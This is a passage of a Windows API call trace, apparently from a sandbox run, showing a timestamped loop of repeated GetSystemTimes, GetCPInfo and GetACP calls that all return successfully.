lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.356] GetACP () returned 0x4e4 [0167.356] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.357] GetACP () returned 0x4e4 [0167.357] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.358] GetACP () returned 0x4e4 [0167.358] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.359] GetACP () returned 0x4e4 [0167.359] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.360] GetACP () returned 0x4e4 [0167.360] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.360] GetACP () returned 0x4e4 [0167.360] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.360] GetACP () returned 0x4e4 [0167.360] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.361] GetACP () returned 0x4e4 [0167.361] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.361] GetACP () returned 0x4e4 [0167.361] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.361] GetACP () returned 0x4e4 [0167.361] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.362] GetACP () returned 0x4e4 [0167.362] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.363] GetACP () returned 0x4e4 [0167.363] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.364] GetACP () returned 0x4e4 [0167.364] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.365] GetACP () returned 0x4e4 [0167.365] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: 